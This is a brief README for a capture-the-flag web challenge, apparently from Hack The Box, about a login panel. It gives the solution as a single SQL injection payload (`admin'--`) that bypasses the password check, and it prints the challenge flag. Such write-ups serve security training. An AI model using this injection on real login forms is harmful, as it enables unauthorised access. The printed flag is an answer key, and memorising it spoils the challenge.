# EsQueElle

## CHALLENGE INFO

We think our agency's login panel application might be vulnerable. Agent, could you assess the security of the website, and help us prevent malicious actors from gaining access to our confidential information?

## Todo

- [ ] Create docker with challange

## Solve

<details>
<summary>Click this to collapse/fold.</summary>

`username=admin'--&password=admin`

</details>

## Flag

HTB{sql_injecting_my_way_in}
